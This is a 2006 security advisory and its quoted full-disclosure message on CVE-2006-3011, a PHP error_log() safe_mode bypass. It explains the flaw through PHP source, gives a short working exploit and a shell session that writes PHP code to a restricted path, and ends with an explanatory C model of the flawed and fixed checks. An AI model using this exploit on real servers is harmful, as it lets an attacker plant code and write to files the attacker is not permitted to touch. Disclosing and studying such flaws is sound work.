PHP error_log() Function Lets Users Bypass Safe Mode File Access Restrictions
SecurityTracker Alert ID: 1016377
SecurityTracker URL: http://securitytracker.com/id?1016377
CVE Reference: CVE-2006-3011
Date: Jun 26 2006
Impact: Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included: Yes
Version(s): 4.4.2, 5.1.4
Description: A vulnerability was reported in PHP in the error_log() function. A user can bypass safe mode restrictions.

A user can supply specially crafted data to the PHP error_log() function to access files on the target system. If the specified filename does not exist, safe_mode is disabled when a URL-type prefix ('[prefix]://../../') is used instead of a pathname.

A user with the privileges to load arbitrary PHP code, or with the ability to specify the parameters of an error_log() function call, can exploit this vulnerability to read from or write to restricted files on the target system.

A demonstration exploit is provided:

<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>

The vendor was notified on June 11, 2006.

Maksymilian Arciemowicz reported this vulnerability.

The original advisory is available at:
http://securityreason.com/achievement_securityalert/41
Impact: A user can bypass safe_mode restrictions.
Solution: No solution was available at the time of this entry.
Vendor URL: www.php.net/
Cause: State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Maksymilian Arciemowicz <max@jestsuper.pl>
Message History: None.

Source Message Contents
Date: Mon, 26 Jun 2006 01:10:48 +0200
From: Maksymilian Arciemowicz <max@jestsuper.pl>
Subject: [Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/41
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 10.6.2006
-Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011
--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
error_log -- Send an error message somewhere.
--- 1. error_log() Safe Mode Bypass ---
The error_log() function sends your error message to email, to a file or to the display. You can send error messages per mail or write them into files.
The issue is very simple. error_log() checks safe_mode and open_basedir in the stream function. But it isn't allowed to use a URL. And the problem exists in an incorrect filename.
PHP5:
-2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {
        case 1: /*send an email */
            {
#if HAVE_SENDMAIL
                if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                    return FAILURE;
                }
#else
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
                return FAILURE;
#endif
            }
            break;
        case 2: /*send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;
        case 3: /*save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;
        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
-2013-2050---
Let's look at option 3.
-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---
Option "a" writes the error to the file or, if the file doesn't exist, creates a new file.
The problem is that in php_stream_open_wrapper(), "IGNORE_URL" is defined.
IGNORE_URL turns off safe_mode if you use "prefix://../../".
-Example---
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php" );'
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Example---
--- 2. Exploit ---
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
?>
--- 3. How to fix ---
No response from the PHP Team. We reported this bug on 11.06.2006.
--- 4. Greets ---
For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
--- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
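The check/use mismatch described in the Description above and in section 1 of the advisory, as an added model written for this page (not PHP source): a simplified safe_mode-style owner check beside a plain-file path resolver that, like IGNORE_URL, treats the "php://../../" string as an ordinary relative path. The ownership table and cwd are constructed from the advisory's session, and the reading that the check defers URL-looking strings to the URL wrapper is an assumption of this model.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for stat(): directory -> owning uid, values from the advisory's session. */
static const struct { const char *dir; int uid; } OWNERS[] = { { "/root", 0 }, { "/www/temp", 80 } };

static int owner_uid(const char *dir) {
    for (size_t i = 0; i < sizeof OWNERS / sizeof *OWNERS; i++)
        if (!strcmp(OWNERS[i].dir, dir)) return OWNERS[i].uid;
    return -1;                                    /* unknown directory: never matches a uid */
}

/* Scheme detection in the style of a stream-wrapper lookup: "[alnum+-.]{2,}://". */
static int looks_like_url(const char *p) {
    size_t n = 0;
    while (isalnum((unsigned char)p[n]) || p[n] == '+' || p[n] == '-' || p[n] == '.') n++;
    return n > 1 && !strncmp(p + n, "://", 3);
}

/* What a plain-file open does with the string once URL syntax is ignored: prepend the
 * cwd to a relative path and collapse "." and "..". Stores the parent directory in `dir`. */
static void resolve_dir(const char *cwd, const char *path, char *dir, size_t sz) {
    char buf[512]; const char *segs[64]; int depth = 0; size_t used = 0;
    snprintf(buf, sizeof buf, "%s/%s", path[0] == '/' ? "" : cwd, path);
    for (char *t = strtok(buf, "/"); t; t = strtok(NULL, "/")) {
        if (!strcmp(t, ".")) continue;
        if (!strcmp(t, "..")) { if (depth) depth--; continue; }
        if (depth < 64) segs[depth++] = t;
    }
    snprintf(dir, sz, "/");                       /* parent of a top-level file is "/" */
    for (int i = 0; i + 1 < depth; i++) used += snprintf(dir + used, sz - used, "/%s", segs[i]);
}

/* Vulnerable order (the advisory's bug, modelled): the owner check sees a URL, leaves it
 * to the URL wrapper and allows; the open then ignores the URL and uses the plain path. */
static int vulnerable_allows(const char *cwd, const char *path, int script_uid) {
    char dir[512];
    if (looks_like_url(path)) return 1;
    resolve_dir(cwd, path, dir, sizeof dir);
    return owner_uid(dir) == script_uid;
}

/* Fixed order: resolve the string exactly as it will be opened, then check that form. */
static int fixed_allows(const char *cwd, const char *path, int script_uid) {
    char dir[512];
    resolve_dir(cwd, path, dir, sizeof dir);
    return owner_uid(dir) == script_uid;
}
```

With cwd "/root" and script uid 0, the plain path "/www/temp/sr.php" is refused by both variants (matching the first warning in the session), while "php://../../www/temp/sr.php" passes the vulnerable check and is refused only by the fixed one.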